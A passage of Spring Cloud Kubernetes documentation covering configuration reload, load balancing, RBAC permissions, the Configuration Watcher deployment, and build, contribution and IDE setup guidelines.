changes.\n\nBy default, this feature is disabled. You can enable it by using the `spring.cloud.kubernetes.reload.enabled=true` configuration property (for example, in the `application.properties` file).\n\nThe following levels of reload are supported (by setting the `spring.cloud.kubernetes.reload.strategy` property):\n\n* `refresh` (default): Only configuration beans annotated with `@ConfigurationProperties` or `@RefreshScope` are reloaded.\nThis reload level leverages the refresh feature of Spring Cloud Context.\n\n* `restart_context`: the whole Spring `ApplicationContext` is gracefully restarted. 
Beans are recreated with the new configuration.\nIn order for the restart context functionality to work properly you must enable and expose the restart actuator endpoint:\n\n====\n[source,yaml]\n----\nmanagement:\n  endpoint:\n    restart:\n      enabled: true\n  endpoints:\n    web:\n      exposure:\n        include: restart\n----\n====\n\n* `shutdown`: the Spring `ApplicationContext` is shut down to activate a restart of the container.\nWhen you use this level, make sure that the lifecycle of all non-daemon threads is bound to the `ApplicationContext`\nand that a replication controller or replica set is configured to restart the pod.\n\nAssuming that the reload feature is enabled with default settings (`refresh` mode), the following bean is refreshed when the config map changes:\n\n====\n[source,java]\n----\n@Configuration\n@ConfigurationProperties(prefix = \"bean\")\npublic class MyConfig {\n\n  private String message = \"a message that can be changed live\";\n\n  \/\/ getters and setters\n\n}\n----\n====\n\nTo see that changes effectively happen, you can create another bean that prints the message periodically, as follows:\n\n====\n[source,java]\n----\n@Component\npublic class MyBean {\n\n  @Autowired\n  private MyConfig config;\n\n  @Scheduled(fixedDelay = 5000)\n  public void hello() {\n    System.out.println(\"The message is: \" + config.getMessage());\n  }\n}\n----\n====\n\nYou can change the message printed by the application by using a `ConfigMap`, as follows:\n\n====\n[source,yaml]\n----\napiVersion: v1\nkind: ConfigMap\nmetadata:\n  name: reload-example\ndata:\n  application.properties: |-\n    bean.message=Hello World!\n----\n====\n\nAny change to the property named `bean.message` in the `ConfigMap` associated with the pod is reflected in the\noutput. More generally speaking, changes associated with properties prefixed with the value defined by the `prefix`\nfield of the `@ConfigurationProperties` annotation are detected and reflected in the application.\n<<configmap-propertysource,Associating a `ConfigMap` with a pod>> is explained earlier in this chapter.\n\nThe full example is available in https:\/\/github.com\/fabric8io\/spring-cloud-kubernetes\/tree\/master\/spring-cloud-kubernetes-examples\/kubernetes-reload-example[`spring-cloud-kubernetes-reload-example`].\n\nThe reload feature supports two operating modes:\n\n* Event (default): Watches for changes in config maps or secrets by using the Kubernetes API (web socket).\nAny event produces a re-check on the configuration and, in case of changes, a reload.\nThe `view` role on the service account is required in order to listen for config map changes. A higher level role (such as `edit`) is required for secrets\n(by default, secrets are not monitored).\n* Polling: Periodically re-creates the configuration from config maps and secrets to see if it has changed.\nYou can configure the polling period by using the `spring.cloud.kubernetes.reload.period` property; it defaults to 15 seconds.\nIt requires the same role as the monitored property source.\nThis means, for example, that using polling on file-mounted secret sources does not require particular privileges.\n
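\nFor example, to switch the reload feature to the `polling` mode with a 30-second period, you could set the following properties (all of them are listed in the table below):\n\n====\n[source]\n----\nspring.cloud.kubernetes.reload.enabled=true\nspring.cloud.kubernetes.reload.mode=polling\nspring.cloud.kubernetes.reload.period=30s\n----\n====\n\n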
.Properties:\n[options=\"header,footer\"]\n|===\n| Name | Type | Default | Description\n| `spring.cloud.kubernetes.reload.enabled` | `Boolean` | `false` | Enables monitoring of property sources and configuration reload\n| `spring.cloud.kubernetes.reload.monitoring-config-maps` | `Boolean` | `true` | Allow monitoring changes in config maps\n| `spring.cloud.kubernetes.reload.monitoring-secrets` | `Boolean` | `false` | Allow monitoring changes in secrets\n| `spring.cloud.kubernetes.reload.strategy` | `Enum` | `refresh` | The strategy to use when firing a reload (`refresh`, `restart_context`, or `shutdown`)\n| `spring.cloud.kubernetes.reload.mode` | `Enum` | `event` | Specifies how to listen for changes in property sources (`event` or `polling`)\n| `spring.cloud.kubernetes.reload.period` | `Duration`| `15s` | The period for verifying changes when using the `polling` strategy\n|===\n\nNotes:\n\n* You should not use properties under `spring.cloud.kubernetes.reload` in config maps or secrets. Changing such properties at runtime may lead to unexpected results.\n* Deleting a property or the whole config map does not restore the original state of the beans when you use the `refresh` level.\n\n== Kubernetes Ecosystem Awareness\n\nAll of the features described earlier in this guide work equally well, regardless of whether your application is running inside\nKubernetes. This is really helpful for development and troubleshooting.\nFrom a development point of view, this lets you start your Spring Boot application and debug one\nof the modules that is part of this project. You need not deploy it in Kubernetes,\nas the code of the project relies on the\nhttps:\/\/github.com\/fabric8io\/kubernetes-client[Fabric8 Kubernetes Java client], which is a fluent DSL that can\ncommunicate with the REST API of the Kubernetes server over the `http` protocol.\n\nTo disable the integration with Kubernetes you can set `spring.cloud.kubernetes.enabled` to `false`. 
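For example:\n\n====\n[source]\n----\nspring.cloud.kubernetes.enabled=false\n----\n====\n\n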
Please be aware that when `spring-cloud-kubernetes-config` is on the classpath,\n`spring.cloud.kubernetes.enabled` should be set in `bootstrap.{properties|yml}` (or the profile specific one). Otherwise, it should be in `application.{properties|yml}` (or the profile specific one).\nAlso note that the `spring.cloud.kubernetes.config.enabled` and `spring.cloud.kubernetes.secrets.enabled` properties only take effect when set in `bootstrap.{properties|yml}`.\n\n=== Kubernetes Profile Autoconfiguration\n\nWhen the application runs as a pod inside Kubernetes, a Spring profile named `kubernetes` automatically gets activated.\nThis lets you customize the configuration, to define beans that are applied when the Spring Boot application is deployed\nwithin the Kubernetes platform (for example, different development and production configuration).\n\n=== Istio Awareness\n\nWhen you include the `spring-cloud-kubernetes-istio` module in the application classpath, a new profile is added to the application,\nprovided the application is running inside a Kubernetes Cluster with https:\/\/istio.io[Istio] installed. You can then use\nSpring `@Profile(\"istio\")` annotations in your Beans and `@Configuration` classes.\n\nThe Istio awareness module uses `me.snowdrop:istio-client` to interact with Istio APIs, letting us discover traffic rules, circuit breakers, and so on,\nmaking it easy for our Spring Boot applications to consume this data to dynamically configure themselves according to the environment.\n\n== Pod Health Indicator\n\nSpring Boot uses https:\/\/github.com\/spring-projects\/spring-boot\/blob\/master\/spring-boot-project\/spring-boot-actuator\/src\/main\/java\/org\/springframework\/boot\/actuate\/health\/HealthEndpoint.java[`HealthIndicator`] to expose info about the health of an application.\nThat makes it really useful for exposing health-related information to the user and makes it a good fit for use as https:\/\/kubernetes.io\/docs\/tasks\/configure-pod-container\/configure-liveness-readiness-probes\/[readiness probes].\n\nThe Kubernetes health indicator (which is part of the core module) exposes the following info:\n\n* Pod name, IP address, namespace, service account, node name, and its IP address\n* A flag that indicates whether the Spring Boot application is internal or external to Kubernetes\n\n== Info Contributor\n\nSpring Cloud Kubernetes includes an `InfoContributor` which adds Pod information to\nSpring Boot's `\/info` Actuator endpoint.\n\nYou can disable this `InfoContributor` by setting `management.info.kubernetes.enabled`\nto `false` in `bootstrap.[properties | yaml]`.\n\n== Leader Election\n\n<TBD>\n\n== LoadBalancer for Kubernetes\n\nThis project includes Spring Cloud Load Balancer for load balancing based on Kubernetes Endpoints and provides an implementation of a load balancer based on a Kubernetes Service.\nTo include it in your project, add the following dependency:\n====\n[source,xml]\n----\n<dependency>\n    <groupId>org.springframework.cloud<\/groupId>\n    <artifactId>spring-cloud-starter-kubernetes-loadbalancer<\/artifactId>\n<\/dependency>\n----\n====\n\nTo enable load balancing based on the Kubernetes Service name, use the following property. The load balancer then tries to call the application by using an address such as `service-a.default.svc.cluster.local`:\n====\n[source]\n----\nspring.cloud.kubernetes.loadbalancer.mode=SERVICE\n----\n====\n\nTo enable load balancing across all namespaces, use the following property (the corresponding property from the `spring-cloud-kubernetes-discovery` module is respected):\n====\n[source]\n----\nspring.cloud.kubernetes.discovery.all-namespaces=true\n----\n====\n
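\nWith the starter on the classpath, a client can then target a service by its name. The following is a minimal sketch (the service name `service-a` and the `\/greeting` endpoint are assumptions for illustration), using the standard Spring Cloud `@LoadBalanced` annotation:\n\n====\n[source,java]\n----\n@Configuration\npublic class ClientConfig {\n\n  @Bean\n  @LoadBalanced\n  public RestTemplate restTemplate() {\n    return new RestTemplate();\n  }\n}\n\n@Service\npublic class GreetingClient {\n\n  @Autowired\n  private RestTemplate restTemplate;\n\n  public String greet() {\n    \/\/ \"service-a\" is resolved by the load balancer implementation\n    return restTemplate.getForObject(\"http:\/\/service-a\/greeting\", String.class);\n  }\n}\n----\n====\n\n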
== Security Configurations Inside Kubernetes\n\n\n=== Namespace\n\nMost of the components provided in this project need to know the namespace. For Kubernetes (1.3+), the namespace is made available to the pod as part of the service account secret and is automatically detected by the client.\nFor earlier versions, it needs to be specified as an environment variable to the pod. A quick way to do this is as follows:\n\n====\n[source]\n----\n env:\n - name: \"KUBERNETES_NAMESPACE\"\n   valueFrom:\n     fieldRef:\n       fieldPath: \"metadata.namespace\"\n----\n====\n\n=== Service Account\n\nFor distributions of Kubernetes that support more fine-grained role-based access within the cluster, you need to make sure a pod that runs with `spring-cloud-kubernetes` has access to the Kubernetes API.\nFor any service accounts you assign to a deployment or pod, you need to make sure they have the correct roles.\n\nDepending on the requirements, you'll need `get`, `list` and `watch` permission on the following resources:\n\n.Kubernetes Resource Permissions\n|===\n|Dependency | Resources\n\n\n|spring-cloud-starter-kubernetes\n|pods, services, endpoints\n\n|spring-cloud-starter-kubernetes-config\n|configmaps, secrets\n|===\n\nFor development purposes, you can add `cluster-reader` permissions to your `default` service account. On a production system you'll likely want to provide more granular permissions.\n\nThe following Role and RoleBinding are an example for namespaced permissions for the `default` account:\n\n====\n[source,yaml]\n----\nkind: Role\napiVersion: rbac.authorization.k8s.io\/v1\nmetadata:\n  namespace: YOUR-NAME-SPACE\n  name: namespace-reader\nrules:\n  - apiGroups: [\"\", \"extensions\", \"apps\"]\n    resources: [\"configmaps\", \"pods\", \"services\", \"endpoints\", \"secrets\"]\n    verbs: [\"get\", \"list\", \"watch\"]\n\n---\n\nkind: RoleBinding\napiVersion: rbac.authorization.k8s.io\/v1\nmetadata:\n  name: namespace-reader-binding\n  namespace: YOUR-NAME-SPACE\nsubjects:\n- kind: ServiceAccount\n  name: default\n  apiGroup: \"\"\nroleRef:\n  kind: Role\n  name: namespace-reader\n  apiGroup: \"\"\n----\n====\n\n== Service Registry Implementation\n\nIn Kubernetes, service registration is controlled by the platform; the application itself does not control\nregistration as it may in other platforms. For this reason, using `spring.cloud.service-registry.auto-registration.enabled`\nor setting `@EnableDiscoveryClient(autoRegister=false)` has no effect in Spring Cloud Kubernetes.\n\n[#spring-cloud-kubernetes-configuration-watcher]\n## Spring Cloud Kubernetes Configuration Watcher\n\nKubernetes provides the ability to https:\/\/kubernetes.io\/docs\/tasks\/configure-pod-container\/configure-pod-configmap\/#add-configmap-data-to-a-volume[mount a ConfigMap or Secret as a volume]\nin the container of your application. When the contents of the ConfigMap or Secret changes, the https:\/\/kubernetes.io\/docs\/tasks\/configure-pod-container\/configure-pod-configmap\/#mounted-configmaps-are-updated-automatically[mounted volume will be updated with those changes].\n\nHowever, Spring Boot will not automatically update those changes unless you restart the application. 
Spring Cloud\nprovides the ability to refresh the application context without restarting the application by either hitting the\nactuator endpoint `\/refresh` or via publishing a `RefreshRemoteApplicationEvent` using Spring Cloud Bus.\n\nTo achieve this configuration refresh of a Spring Cloud app running on Kubernetes, you can deploy the Spring Cloud\nKubernetes Configuration Watcher controller into your Kubernetes cluster.\n\nThe application is published as a container and is available on https:\/\/hub.docker.com\/repository\/docker\/springcloud\/spring-cloud-kubernetes-configuration-watcher[Docker Hub].\n\nSpring Cloud Kubernetes Configuration Watcher can send refresh notifications to applications in two ways:\n\n1. Over HTTP, in which case the application being notified must have the `\/refresh` actuator endpoint exposed and accessible from within the cluster\n2. Using Spring Cloud Bus, in which case you will need a message broker deployed to your cluster for the application to use.\n\n### Deployment YAML\n\nBelow is a sample deployment YAML you can use to deploy the Kubernetes Configuration Watcher to Kubernetes.\n\n====\n[source,yaml]\n----\n---\napiVersion: v1\nkind: List\nitems:\n  - apiVersion: v1\n    kind: Service\n    metadata:\n      labels:\n        app: spring-cloud-kubernetes-configuration-watcher\n      name: spring-cloud-kubernetes-configuration-watcher\n    spec:\n      ports:\n        - name: http\n          port: 8888\n          targetPort: 8888\n      selector:\n        app: spring-cloud-kubernetes-configuration-watcher\n      type: ClusterIP\n  - apiVersion: v1\n    kind: ServiceAccount\n    metadata:\n      labels:\n        app: spring-cloud-kubernetes-configuration-watcher\n      name: spring-cloud-kubernetes-configuration-watcher\n  - apiVersion: rbac.authorization.k8s.io\/v1\n    kind: RoleBinding\n    metadata:\n      labels:\n        app: spring-cloud-kubernetes-configuration-watcher\n      name: spring-cloud-kubernetes-configuration-watcher:view\n    roleRef:\n      kind: Role\n      apiGroup: rbac.authorization.k8s.io\n      name: namespace-reader\n    subjects:\n      - kind: ServiceAccount\n        name: spring-cloud-kubernetes-configuration-watcher\n  - apiVersion: rbac.authorization.k8s.io\/v1\n    kind: Role\n    metadata:\n      namespace: default\n      name: namespace-reader\n    rules:\n      - apiGroups: [\"\", \"extensions\", \"apps\"]\n        resources: [\"configmaps\", \"pods\", \"services\", \"endpoints\", \"secrets\"]\n        verbs: [\"get\", \"list\", \"watch\"]\n  - apiVersion: apps\/v1\n    kind: Deployment\n    metadata:\n      name: spring-cloud-kubernetes-configuration-watcher-deployment\n    spec:\n      selector:\n        matchLabels:\n          app: spring-cloud-kubernetes-configuration-watcher\n      template:\n        metadata:\n          labels:\n            app: spring-cloud-kubernetes-configuration-watcher\n        spec:\n          serviceAccount: spring-cloud-kubernetes-configuration-watcher\n          containers:\n          - name: spring-cloud-kubernetes-configuration-watcher\n            image: springcloud\/spring-cloud-kubernetes-configuration-watcher:2.0.0-SNAPSHOT\n            imagePullPolicy: IfNotPresent\n            readinessProbe:\n              httpGet:\n                port: 8888\n                path: \/actuator\/health\/readiness\n            livenessProbe:\n              httpGet:\n                port: 8888\n                path: \/actuator\/health\/liveness\n            ports:\n            - containerPort: 8888\n\n----\n====\n\nThe Service Account and associated Role Binding are important for Spring Cloud Kubernetes Configuration Watcher to work properly.\nThe controller needs access to read data about ConfigMaps, Pods, Services, Endpoints and Secrets in the Kubernetes cluster.\n\n### Monitoring ConfigMaps and Secrets\n\nSpring Cloud Kubernetes Configuration Watcher will react to changes in ConfigMaps with a label of `spring.cloud.kubernetes.config` with the value `true`\nor any Secret with a label of `spring.cloud.kubernetes.secret` with the value `true`. If the ConfigMap or Secret does not have either of those labels\nor the values of those labels is not `true`, then any changes will be ignored.\n
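\nFor example, a ConfigMap that the watcher reacts to might look as follows (a sketch; the name and data keys are illustrative):\n\n====\n[source,yaml]\n----\napiVersion: v1\nkind: ConfigMap\nmetadata:\n  name: config-map-demo\n  labels:\n    spring.cloud.kubernetes.config: \"true\"\ndata:\n  application.properties: |-\n    greeting.message=Hello\n----\n====\n\n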
The labels Spring Cloud Kubernetes Configuration Watcher looks for on ConfigMaps and Secrets can be changed by setting\n`spring.cloud.kubernetes.configuration.watcher.configLabel` and `spring.cloud.kubernetes.configuration.watcher.secretLabel` respectively.\n\nIf a change is made to a ConfigMap or Secret with valid labels, then Spring Cloud Kubernetes Configuration Watcher will take the name of the ConfigMap or Secret\nand send a notification to the application with that name.\n\n### HTTP Implementation\n\nThe HTTP implementation is what is used by default. When this implementation is used and a change to a ConfigMap or Secret occurs, Spring Cloud Kubernetes Configuration Watcher will use the Spring Cloud Kubernetes Discovery Client to fetch all\ninstances of the application which match the name of the ConfigMap or Secret and send an HTTP POST request to the application's actuator\n`\/refresh` endpoint. By default it will send the POST request to `\/actuator\/refresh` using the port registered in the discovery client.\n\n#### Non-Default Management Port and Actuator Path\n\nIf the application is using a non-default actuator path and\/or using a different port for the management endpoints, the Kubernetes service for the application\ncan add an annotation called `boot.spring.io\/actuator` and set its value to the path and port used by the application. For example:\n\n====\n[source,yaml]\n----\napiVersion: v1\nkind: Service\nmetadata:\n  labels:\n    app: config-map-demo\n  name: config-map-demo\n  annotations:\n    boot.spring.io\/actuator: http:\/\/:9090\/myactuator\/home\nspec:\n  ports:\n    - name: http\n      port: 8080\n      targetPort: 8080\n  selector:\n    app: config-map-demo\n----\n====\n\n\nAnother way you can choose to configure the actuator path and\/or management port is by setting\n`spring.cloud.kubernetes.configuration.watcher.actuatorPath` and `spring.cloud.kubernetes.configuration.watcher.actuatorPort`.\n\n### Messaging Implementation\n\nThe messaging implementation can be enabled by setting the profile to either `bus-amqp` (RabbitMQ) or `bus-kafka` (Kafka) when the Spring Cloud Kubernetes Configuration Watcher\napplication is deployed to Kubernetes.\n\n### Configuring RabbitMQ\n\nWhen the `bus-amqp` profile is enabled, you will need to configure Spring RabbitMQ to point it to the location of the RabbitMQ\ninstance you would like to use, as well as any credentials necessary to authenticate. This can be done\nby setting the standard Spring RabbitMQ properties, for example:\n\n====\n[source,yaml]\n----\nspring:\n  rabbitmq:\n    username: user\n    password: password\n    host: rabbitmq\n----\n====\n\n### Configuring Kafka\n\nWhen the `bus-kafka` profile is enabled, you will need to configure Spring Kafka to point it to the location of the Kafka Broker\ninstance you would like to use. 
This can be done by setting the standard Spring Kafka properties, for example:\n\n====\n[source,yaml]\n----\nspring:\n  kafka:\n    producer:\n      bootstrap-servers: localhost:9092\n----\n====\n\n== Examples\n\nSpring Cloud Kubernetes tries to make it transparent for your applications to consume Kubernetes Native Services by\nfollowing the Spring Cloud interfaces.\n\nIn your applications, you need to add the `spring-cloud-kubernetes-discovery` dependency to your classpath and remove any other dependency that contains a `DiscoveryClient` implementation (for example, a Eureka discovery client).\nThe same applies for `PropertySourceLocator`, where you need to add to the classpath the `spring-cloud-kubernetes-config` and remove any other dependency that contains a `PropertySourceLocator` implementation (for example, a configuration server client).\n\nThe following projects highlight the usage of these dependencies and demonstrate how you can use these libraries from any Spring Boot application:\n\n* https:\/\/github.com\/spring-cloud\/spring-cloud-kubernetes\/tree\/master\/spring-cloud-kubernetes-examples[Spring Cloud Kubernetes Examples]: the ones located inside this repository.\n* Spring Cloud Kubernetes Full Example: Minions and Boss\n\t** https:\/\/github.com\/salaboy\/spring-cloud-k8s-minion[Minion]\n\t** https:\/\/github.com\/salaboy\/spring-cloud-k8s-boss[Boss]\n* Spring Cloud Kubernetes Full Example: https:\/\/github.com\/salaboy\/s1p_docs[SpringOne Platform Tickets Service]\n* https:\/\/github.com\/salaboy\/s1p_gateway[Spring Cloud Gateway with Spring Cloud Kubernetes Discovery and Config]\n* https:\/\/github.com\/salaboy\/showcase-admin-tool[Spring Boot Admin with Spring Cloud Kubernetes Discovery and Config]\n\n== Other Resources\n\nThis section lists other resources, such as presentations (slides) and videos about Spring Cloud Kubernetes.\n\n* https:\/\/salaboy.com\/2018\/09\/27\/the-s1p-experience\/[S1P Spring Cloud on PKS]\n* https:\/\/salaboy.com\/2018\/07\/18\/ljc-july-18-spring-cloud-docker-k8s\/[Spring Cloud, Docker, Kubernetes -> London Java Community July 2018]\n\n\nPlease feel free to submit other resources through pull requests to https:\/\/github.com\/spring-cloud\/spring-cloud-kubernetes[this repository].\n\n== Configuration properties\n\nTo see the list of all Spring Cloud Kubernetes related configuration properties, please check link:appendix.html[the Appendix page].\n\n== Building\n\n:jdkversion: 1.7\n\n=== Basic Compile and Test\n\nTo build the source you will need to install JDK {jdkversion}.\n\nSpring Cloud uses Maven for most build-related activities, and you\nshould be able to get off the ground quite quickly by cloning the\nproject you are interested in and typing\n\n----\n$ .\/mvnw install\n----\n\nNOTE: You can also install Maven (>=3.3.3) yourself and run the `mvn` command\nin place of `.\/mvnw` in the examples below. If you do that you also\nmight need to add `-P spring` if your local Maven settings do not\ncontain repository declarations for spring pre-release artifacts.\n\nNOTE: Be aware that you might need to increase the amount of memory\navailable to Maven by setting a `MAVEN_OPTS` environment variable with\na value like `-Xmx512m -XX:MaxPermSize=128m`. We try to cover this in\nthe `.mvn` configuration, so if you find you have to do it to make a\nbuild succeed, please raise a ticket to get the settings added to\nsource control.\n\nFor hints on how to build the project look in `.travis.yml` if there\nis one. There should be a \"script\" and maybe \"install\" command. 
Also\nlook at the \"services\" section to see if any services need to be\nrunning locally (e.g. mongo or rabbit). Ignore the git-related bits\nthat you might find in \"before_install\" since they're related to setting git\ncredentials and you already have those.\n\nThe projects that require middleware generally include a\n`docker-compose.yml`, so consider using\nhttps:\/\/docs.docker.com\/compose\/[Docker Compose] to run the middleware servers\nin Docker containers. See the README in the\nhttps:\/\/github.com\/spring-cloud-samples\/scripts[scripts demo\nrepository] for specific instructions about the common cases of mongo,\nrabbit and redis.\n\nNOTE: If all else fails, build with the command from `.travis.yml` (usually\n`.\/mvnw install`).\n\n=== Documentation\n\nThe spring-cloud-build module has a \"docs\" profile, and if you switch\nthat on it will try to build asciidoc sources from\n`src\/main\/asciidoc`. As part of that process it will look for a\n`README.adoc` and process it by loading all the includes, but not\nparsing or rendering it, just copying it to `${main.basedir}`\n(defaults to `${basedir}`, i.e. the root of the project). If there are\nany changes in the README it will then show up after a Maven build as\na modified file in the correct place. Just commit it and push the change.\n\n=== Working with the code\nIf you don't have an IDE preference we would recommend that you use\nhttps:\/\/www.springsource.com\/developer\/sts[Spring Tools Suite] or\nhttps:\/\/eclipse.org[Eclipse] when working with the code. We use the\nhttps:\/\/eclipse.org\/m2e\/[m2eclipse] eclipse plugin for maven support. Other IDEs and tools\nshould also work without issue as long as they use Maven 3.3.3 or better.\n\n==== Activate the Spring Maven profile\nSpring Cloud projects require the 'spring' Maven profile to be activated to resolve\nthe spring milestone and snapshot repositories. Use your preferred IDE to set this\nprofile to be active, or you may experience build errors.\n\n==== Importing into eclipse with m2eclipse\nWe recommend the https:\/\/eclipse.org\/m2e\/[m2eclipse] eclipse plugin when working with\neclipse. If you don't already have m2eclipse installed it is available from the \"eclipse\nmarketplace\".\n\nNOTE: Older versions of m2e do not support Maven 3.3, so once the\nprojects are imported into Eclipse you will also need to tell\nm2eclipse to use the right profile for the projects. If you\nsee many different errors related to the POMs in the projects, check\nthat you have an up to date installation. If you can't upgrade m2e,\nadd the \"spring\" profile to your `settings.xml`. Alternatively you can\ncopy the repository settings from the \"spring\" profile of the parent\npom into your `settings.xml`.\n\n==== Importing into eclipse without m2eclipse\nIf you prefer not to use m2eclipse you can generate eclipse project metadata using the\nfollowing command:\n\n[indent=0]\n----\n\t$ .\/mvnw eclipse:eclipse\n----\n\nThe generated eclipse projects can be imported by selecting `import existing projects`\nfrom the `file` menu.\n\n\n== Contributing\n\n:spring-cloud-build-branch: master\n\nSpring Cloud is released under the non-restrictive Apache 2.0 license,\nand follows a very standard Github development process, using Github\ntracker for issues and merging pull requests into master. 
If you want\nto contribute even something trivial please do not hesitate, but\nfollow the guidelines below.\n\n=== Sign the Contributor License Agreement\nBefore we accept a non-trivial patch or pull request we will need you to sign the\nhttps:\/\/cla.pivotal.io\/sign\/spring[Contributor License Agreement].\nSigning the contributor's agreement does not grant anyone commit rights to the main\nrepository, but it does mean that we can accept your contributions, and you will get an\nauthor credit if we do. Active contributors might be asked to join the core team, and\ngiven the ability to merge pull requests.\n\n=== Code of Conduct\nThis project adheres to the Contributor Covenant https:\/\/github.com\/spring-cloud\/spring-cloud-build\/blob\/master\/docs\/src\/main\/asciidoc\/code-of-conduct.adoc[code of\nconduct]. By participating, you are expected to uphold this code. Please report\nunacceptable behavior to spring-code-of-conduct@pivotal.io.\n\n=== Code Conventions and Housekeeping\nNone of these is essential for a pull request, but they will all help. They can also be\nadded after the original pull request but before a merge.\n\n* Use the Spring Framework code format conventions. If you use Eclipse\n you can import formatter settings using the\n `eclipse-code-formatter.xml` file from the\n https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/master\/spring-cloud-dependencies-parent\/eclipse-code-formatter.xml[Spring\n Cloud Build] project. If using IntelliJ, you can use the\n https:\/\/plugins.jetbrains.com\/plugin\/6546[Eclipse Code Formatter\n Plugin] to import the same file.\n* Make sure all new `.java` files to have a simple Javadoc class comment with at least an\n `@author` tag identifying you, and preferably at least a paragraph on what the class is\n for.\n* Add the ASF license header comment to all new `.java` files (copy from existing files\n in the project)\n* Add yourself as an `@author` to the .java files that you modify substantially (more\n than cosmetic changes).\n* Add some Javadocs and, if you change the namespace, some XSD doc elements.\n* A few unit tests would help a lot as well -- someone has to do it.\n* If no-one else is using your branch, please rebase it against the current master (or\n other target branch in the main project).\n* When writing a commit message please follow https:\/\/tbaggery.com\/2008\/04\/19\/a-note-about-git-commit-messages.html[these conventions],\n if you are fixing an existing issue please add `Fixes gh-XXXX` at the end of the commit\n message (where XXXX is the issue number).\n\n=== Checkstyle\n\nSpring Cloud Build comes with a set of checkstyle rules. You can find them in the `spring-cloud-build-tools` module. The most notable files under the module are:\n\n.spring-cloud-build-tools\/\n----\n\u2514\u2500\u2500 src\n \u00a0\u00a0 \u251c\u2500\u2500 checkstyle\n \u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 checkstyle-suppressions.xml <3>\n \u00a0\u00a0 \u2514\u2500\u2500 main\n \u00a0\u00a0 \u2514\u2500\u2500 resources\n \u00a0\u00a0 \u251c\u2500\u2500 checkstyle-header.txt <2>\n \u00a0\u00a0 \u2514\u2500\u2500 checkstyle.xml <1>\n----\n<1> Default Checkstyle rules\n<2> File header setup\n<3> Default suppression rules\n\n==== Checkstyle configuration\n\nCheckstyle rules are *disabled by default*. 
To add checkstyle to your project just define the following properties and plugins.\n\n.pom.xml\n----\n<properties>\n<maven-checkstyle-plugin.failsOnError>true<\/maven-checkstyle-plugin.failsOnError> <1>\n <maven-checkstyle-plugin.failsOnViolation>true\n <\/maven-checkstyle-plugin.failsOnViolation> <2>\n <maven-checkstyle-plugin.includeTestSourceDirectory>true\n <\/maven-checkstyle-plugin.includeTestSourceDirectory> <3>\n<\/properties>\n\n<build>\n <plugins>\n <plugin> <4>\n <groupId>io.spring.javaformat<\/groupId>\n <artifactId>spring-javaformat-maven-plugin<\/artifactId>\n <\/plugin>\n <plugin> <5>\n <groupId>org.apache.maven.plugins<\/groupId>\n <artifactId>maven-checkstyle-plugin<\/artifactId>\n <\/plugin>\n <\/plugins>\n\n <reporting>\n <plugins>\n <plugin> <5>\n <groupId>org.apache.maven.plugins<\/groupId>\n <artifactId>maven-checkstyle-plugin<\/artifactId>\n <\/plugin>\n <\/plugins>\n <\/reporting>\n<\/build>\n----\n<1> Fails the build upon Checkstyle errors\n<2> Fails the build upon Checkstyle violations\n<3> Checkstyle analyzes also the test sources\n<4> Add the Spring Java Format plugin that will reformat your code to pass most of the Checkstyle formatting rules\n<5> Add checkstyle plugin to your build and reporting phases\n\nIf you need to suppress some rules (e.g. line length needs to be longer), then it's enough for you to define a file under `${project.root}\/src\/checkstyle\/checkstyle-suppressions.xml` with your suppressions. Example:\n\n.projectRoot\/src\/checkstyle\/checkstyle-suppresions.xml\n----\n<?xml version=\"1.0\"?>\n<!DOCTYPE suppressions PUBLIC\n\t\t\"-\/\/Puppy Crawl\/\/DTD Suppressions 1.1\/\/EN\"\n\t\t\"https:\/\/www.puppycrawl.com\/dtds\/suppressions_1_1.dtd\">\n<suppressions>\n\t<suppress files=\".*ConfigServerApplication\\.java\" checks=\"HideUtilityClassConstructor\"\/>\n\t<suppress files=\".*ConfigClientWatch\\.java\" checks=\"LineLengthCheck\"\/>\n<\/suppressions>\n----\n\nIt's advisable to copy the `${spring-cloud-build.rootFolder}\/.editorconfig` and `${spring-cloud-build.rootFolder}\/.springformat` to your project. That way, some default formatting rules will be applied. 
You can do so by running this script:\n\n```bash\n$ curl https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/master\/.editorconfig -o .editorconfig\n$ touch .springformat\n```\n\n=== IDE setup\n\n==== Intellij IDEA\n\nIn order to setup Intellij you should import our coding conventions, inspection profiles and set up the checkstyle plugin.\nThe following files can be found in the https:\/\/github.com\/spring-cloud\/spring-cloud-build\/tree\/master\/spring-cloud-build-tools[Spring Cloud Build] project.\n\n.spring-cloud-build-tools\/\n----\n\u2514\u2500\u2500 src\n \u00a0\u00a0 \u251c\u2500\u2500 checkstyle\n \u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 checkstyle-suppressions.xml <3>\n \u00a0\u00a0 \u2514\u2500\u2500 main\n \u00a0\u00a0 \u2514\u2500\u2500 resources\n \u00a0\u00a0 \u251c\u2500\u2500 checkstyle-header.txt <2>\n \u00a0\u00a0 \u251c\u2500\u2500 checkstyle.xml <1>\n \u00a0\u00a0 \u2514\u2500\u2500 intellij\n \u00a0\u00a0 \u00a0\u00a0 \u251c\u2500\u2500 Intellij_Project_Defaults.xml <4>\n \u00a0\u00a0 \u00a0\u00a0 \u2514\u2500\u2500 Intellij_Spring_Boot_Java_Conventions.xml <5>\n----\n<1> Default Checkstyle rules\n<2> File header setup\n<3> Default suppression rules\n<4> Project defaults for Intellij that apply most of Checkstyle rules\n<5> Project style conventions for Intellij that apply most of Checkstyle rules\n\n.Code style\n\nimage::https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/{spring-cloud-build-branch}\/docs\/src\/main\/asciidoc\/images\/intellij-code-style.png[Code style]\n\nGo to `File` -> `Settings` -> `Editor` -> `Code style`. There click on the icon next to the `Scheme` section. There, click on the `Import Scheme` value and pick the `Intellij IDEA code style XML` option. Import the `spring-cloud-build-tools\/src\/main\/resources\/intellij\/Intellij_Spring_Boot_Java_Conventions.xml` file.\n\n.Inspection profiles\n\nimage::https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/{spring-cloud-build-branch}\/docs\/src\/main\/asciidoc\/images\/intellij-inspections.png[Code style]\n\nGo to `File` -> `Settings` -> `Editor` -> `Inspections`. There click on the icon next to the `Profile` section. There, click on the `Import Profile` and import the `spring-cloud-build-tools\/src\/main\/resources\/intellij\/Intellij_Project_Defaults.xml` file.\n\n.Checkstyle\n\nTo have Intellij work with Checkstyle, you have to install the `Checkstyle` plugin. It's advisable to also install the `Assertions2Assertj` to automatically convert the 